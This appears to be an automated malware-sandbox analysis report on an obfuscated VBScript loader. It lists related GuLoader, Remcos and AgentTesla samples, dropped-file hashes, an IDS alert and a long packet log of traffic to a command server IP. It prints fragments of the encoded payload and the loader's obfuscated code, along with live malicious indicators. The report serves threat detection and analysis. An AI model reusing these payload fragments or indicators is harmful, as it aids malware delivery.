 | 7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 199.103.62.205
 | Ref#150689.vbe | malicious | AgentTesla | 199.103.62.205
 | MEC20241022001.bat | malicious | Remcos, GuLoader | 199.103.62.205
 | SecuriteInfo.com.Win32.Malware-gen.5541.4493.exe | malicious | Babadeda | 199.103.62.205
 | Setup.exe | malicious | Unknown | 199.103.62.205
 | https://u.to/YaL0IA | malicious | Unknown | 199.103.62.205
 | https://warriorplus.com/o2/a/jxwtscv/0 | malicious | Unknown | 199.103.62.205
37f463bf4616ecd445d4a1937da06e19 | Massageapparater.vbs | malicious | FormBook, GuLoader | 199.103.62.205
 | phc.exe | malicious | Unknown | 199.103.62.205
 | phc.exe | malicious | Unknown | 199.103.62.205
 | 001_215_EA2047939_202410210815.exe | malicious | GuLoader, Snake Keylogger | 199.103.62.205
 | Fignen234.exe | malicious | GuLoader | 199.103.62.205
 | Fignen234.exe | malicious | FormBook, GuLoader | 199.103.62.205
 | MEC20241022001.bat | malicious | Remcos, GuLoader | 199.103.62.205
 | zamowienie.exe | malicious | GuLoader | 199.103.62.205
 | zamowienie.exe | malicious | GuLoader | 199.103.62.205
 | LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat | malicious | Remcos, GuLoader | 199.103.62.205
                                                                      No context
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):8003
                                                                      Entropy (8bit):4.840877972214509
                                                                      Encrypted:false
                                                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                      MD5:106D01F562D751E62B702803895E93E0
                                                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                      Malicious:false
                                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1940658735648508
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlllultnxj:NllU
                                                                      MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                      SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                      SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                      SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                      Malicious:false
                                                                      Preview:@...e................................................@..........
                                                                      Process:C:\Windows\SysWOW64\cmdkey.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.121297215059106
                                                                      Encrypted:false
                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):494360
                                                                      Entropy (8bit):5.8776690634795985
                                                                      Encrypted:false
                                                                      SSDEEP:6144:E69gXZ/Utuhrqc0u7CUiKK1NHkrQ9owSIBo4Zuv3UzSDbb2VDXuMxrGHK+mwz86:EbNUtuh7T2U5INmQ9/B1zOn+CqFf6
                                                                      MD5:75819AD2782CC2BAC53D0B9983775B66
                                                                      SHA1:9A4154E44EF74876B2D5EB006D108CCB109006A7
                                                                      SHA-256:94BED04A729D0F20CB480D34FBF0FD570269DF51BD8263B3CA55FA457F007510
                                                                      SHA-512:7D02487E8148671E3C49CEF9746EB0AE66240CA7B7D3723CEA8370E0E5465828E653B0CE21EA79EFD39E7731F55B69FBDFBCA89ED7F8B287D28BE4644B3E06F8
                                                                      Malicious:false
                                                                      Preview:cQGbcQGbu7uLDABxAZvrApKRA1wkBOsCxlFxAZu53LhsKOsCjepxAZuB8Z+wurDrAuy06wJjyYHpQwjWmHEBm3EBm+sC76HrAhRtuh0TMOrrApKY6wKCkesCpRZxAZsxyusCnXTrApxdiRQL6wKAFXEBm9Hi6wLI/HEBm4PBBOsC7+1xAZuB+QXnTQJ8yusCHfnrAh2vi0QkBOsCUArrAiyjicNxAZtxAZuBw5v0twHrAnlVcQGburry+C/rApi46wKoV4HyX3uhtHEBm+sCR8eBwht2pmTrAiHMcQGb6wLm9usC2C/rAjNx6wLFHYsMEOsCIAxxAZuJDBNxAZvrAmsgQnEBm3EBm4H6ADUFAHXVcQGbcQGbiVwkDOsCgZDrAikbge0AAwAA6wKpgnEBm4tUJAhxAZtxAZuLfCQEcQGbcQGbievrAhLjcQGbgcOcAAAA6wIBEHEBm1PrArkFcQGbakBxAZtxAZuJ63EBm+sCtvzHgwABAAAAgF0CcQGb6wLGC4HDAAEAAHEBm+sCDnRTcQGbcQGbievrAoSh6wKv34m7BAEAAHEBm+sCaBuBwwQBAADrAtzucQGbU+sCJLPrAp+rav/rAkiEcQGbg8IFcQGb6wLvwzH26wJmdusCBU8xyesCRLXrAr9VixpxAZvrAiFfQesCy7zrApeTORwKdfJxAZtxAZtG6wJpqOsCYaOAfAr7uHXccQGbcQGbi0QK/OsCbgvrAlBGKfDrAhIr6wKzDP/S6wJFCHEBm7oANQUAcQGbcQGbMcBxAZtxAZuLfCQM6wJge3EBm4E0ByujzWRxAZvrAlXQg8AEcQGb6wLgvjnQdeRxAZvrAsQhifvrAjv5cQGb/9dxAZtxAZsXWyVkK6PNP6JGROEQXDKbk3rcBRWOM5aeXvj+jg0OUWobyOcCZ0bhEFwym34qKN2I3I0PrmFMjalRbXmqSgoqoJRMjWmd2XKvR6td+mSJaSve6kjnIrlpK6aKvCkn
                                                                      File type:ASCII text, with CRLF line terminators
                                                                      Entropy (8bit):5.389092938561215
                                                                      TrID:
                                                                      • Visual Basic Script (13500/0) 100.00%
                                                                      File name:6 654398.vbs
                                                                      File size:26'221 bytes
                                                                      MD5:2270731a281cd40f18f75b69a308207d
                                                                      SHA1:b4d8bc01ca3ef042e7c4839edc21967bd735e1fc
                                                                      SHA256:dbe9edac7d02e3a20e96ae4869966673cfa2505094c3ef06ca1250cffd097f5f
                                                                      SHA512:fd437fc5145402334761e5470c6f3cac2a5938934f278e7e6500b55b38e6a8ecd714040914b196091f3e452ed2e51bf161e11b24b5c284a1a70df4d00efdadb8
                                                                      SSDEEP:384:XrCiOP9v7UpQyrGC0TgSyBamu7fjw7z5E3zn8j1Q:XeDPernxSyBaz7fke3z8j2
                                                                      TLSH:CCC23C6548467FE41EF76BB644453130987C04B2C93980E0690CB427F938BEFAE689FB
                                                                      File Content Preview:Sub Evulge(Konvojtronbestigelser,Transiteranatoleallo,Filstrenggenman,Shelteunderskabe,Polleesammentrykni)..If Konvojtronbestigelser = cstr(2614147) Then ....Cirkusforestillinge41 = Space(69)....End If....while (Alkydmalingernesb<31)..Alkydmalingernesb =
                                                                      Icon Hash:68d69b8f86ab9a86
Timestamp                        SID      Signature                                            Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-10-22T15:32:15.637893+0200  2803270  ETPRO MALWARE Common Downloader Header Pattern UHCa  2         192.168.2.5  49988        199.103.62.205  443        TCP
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Oct 22, 2024 15:31:20.570519924 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:20.570554972 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:20.571019888 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:20.578388929 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:20.578407049 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:21.406456947 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:21.406800032 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:21.435338020 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:21.435359955 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:21.435672998 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:21.485169888 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:21.594125986 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:21.635337114 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:21.899041891 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:21.926378965 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:21.926397085 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:21.926431894 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:21.926450014 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:21.926464081 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:21.927054882 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:21.927054882 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:21.927073956 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:21.927335024 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.271048069 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.271061897 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.271101952 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.271233082 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.271249056 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.271332979 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.271332979 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.273503065 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.273520947 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.273646116 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.273655891 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.273727894 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.280181885 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.280209064 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.280380011 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.280391932 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.280447960 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.397528887 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.397563934 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.397876024 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.397897005 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.397977114 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.514872074 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.514897108 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.516192913 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.516218901 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.519978046 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.632448912 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.632472992 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.633579016 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.633596897 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.633872032 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.633989096 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.634006023 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.634337902 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.634345055 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.634443998 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.751749039 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.751775026 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.752501011 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.752523899 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.752593994 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.868544102 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.868568897 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.868779898 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.868794918 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.868911028 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.986107111 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.986174107 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.986257076 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.986275911 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.986332893 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.986332893 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.987704039 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.987756968 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.987903118 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.987903118 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:22.987943888 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:22.988296032 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:23.105968952 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.105993032 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.106174946 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:23.106194019 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.106365919 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:23.222476959 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.222551107 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.222647905 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:23.222664118 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.222733021 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:23.222733021 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:23.339303970 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.339376926 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.339468002 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:23.339484930 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.339507103 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:23.339637995 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:23.340909958 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.340926886 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.341029882 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:23.341037989 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.341114998 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:23.457731962 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.457756996 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.457823992 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:23.457832098 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.457954884 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:23.457954884 CEST  49718        443        192.168.2.5     199.103.62.205
Oct 22, 2024 15:31:23.459578991 CEST  443          49718      199.103.62.205  192.168.2.5
Oct 22, 2024 15:31:23.459646940 CEST  443          49718      199.103.62.205  192.168.2.5
                                                                      Oct 22, 2024 15:31:23.459712982 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.459712982 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.459722042 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.460009098 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.576740980 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.576775074 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.577012062 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.577034950 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.577148914 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.692698002 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.692727089 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.692871094 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.692871094 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.692894936 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.692960978 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.694592953 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.694621086 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.694741011 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.694741011 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.694749117 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.694890976 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.810445070 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.810481071 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.810655117 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.810686111 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.810746908 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.812517881 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.812536001 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.812598944 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:23.812617064 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:23.812824965 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.286140919 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.286156893 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.286199093 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.286461115 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.286461115 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.286484957 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.286624908 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.286648035 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.286690950 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.286690950 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.286700010 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.286716938 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.286839008 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.288091898 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.288114071 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.288162947 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.288171053 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.288182020 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.288206100 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.288218975 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.288218975 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.288227081 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.288378954 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.288378954 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.289757013 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.289774895 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.289830923 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.289836884 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.289938927 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.289938927 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.291122913 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.291146994 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.291251898 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.291269064 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.291332960 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.292282104 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.292289972 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.292406082 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.292416096 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.292427063 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.292469025 CEST49718443192.168.2.5199.103.62.205
                                                                      Oct 22, 2024 15:31:24.292474985 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.292488098 CEST44349718199.103.62.205192.168.2.5
                                                                      Oct 22, 2024 15:31:24.292563915 CEST49718443192.168.2.5199.103.62.205
